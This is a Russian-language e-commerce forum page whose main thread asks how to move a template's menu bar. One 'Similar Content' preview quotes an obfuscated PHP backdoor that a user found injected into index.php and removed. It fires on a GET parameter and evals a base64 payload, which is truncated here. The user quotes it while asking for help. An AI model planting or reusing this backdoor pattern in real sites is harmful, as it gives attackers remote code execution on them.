Jump to content

Recommended Posts

Добрый день

 

Подскажите, пожалуйста, как можно переместить и(или) стандарную панель меню

Шаблон shoppest

 

 

 

post-684673-0-74657500-1404389866_thumb.jpg

Share this post


Link to post
Share on other sites

Думаю стоит начать с этого http://htmlbook.ru/samhtml
Если собираетесь делать своими силами.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Similar Content

    • By insona10
      Всем привет, использую сейчас стандартный бесплатный модуль от Яндекс Маркета и столкнулся с проблемой. Этот модуль выгружает все опции размеров товара на сайт, даже которых нет. Например есть 4 размера у товара, 1,2,3 - нет, а 4 - есть, вот модуль выгружает все размеры и соответственно, клиент переходящий с Маркета по карточке размера 1, попадает на карточку товара, где только размер 4, и цена дороже соответственно, из-за этого блокирует Маркет.
       
      Нужно настроить, чтобы он брал данные о количестве из вкладки Опции карточки товаров? Или еще варианты, чтобы выгружал только те размеры, которые есть на сайте.
      Очень желательно вот через этот модуль: 
       
       
    • By sabero
      Помогите, пожалуйста, как решить проблему. В дефолтном шаблоне (1 скрин) все подпункты в категории выдвигаются так, что их сразу видно. У меня же(2) они почему-то только со скроллом, и тот с чудовищной чувствительностью. Как решить проблему?


    • By Anton999
      Приветствую!
       
      Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.
       
      Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.
       
      Всем спасибо!
    • By jtgroup
      Добрый день!
      требуется начальная настройка сайта на поддомене. с последующим переносом на основной домен.
      сайт на ocstore 3.0 шаблон лайтшоп. установлены модули мультиязычности и джеткэш.
      1. в идеале запустить на php 7 сейчас php 5.6
      1.1 настройка .htaccess , настройка https 
      2. проверка работоспособности ( сейчас при переходе в категории бросает снова на главную)
      3. перенос сайта на основной домен. требуется чуть позже после того как я наполню сайт.
       
    • By Ehanes
      Добрый день. Вопрос следующий: для отслеживания конверсий (целей) необходимо сделать кнопку "Показать телефон". Т.е. в шапке сайта телефон будет скрытый и отобразится только после клика клиента. Как это возможно реализовать? Если процесс трудоемкий - пишите в личку - обсудим вознаграждение.
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.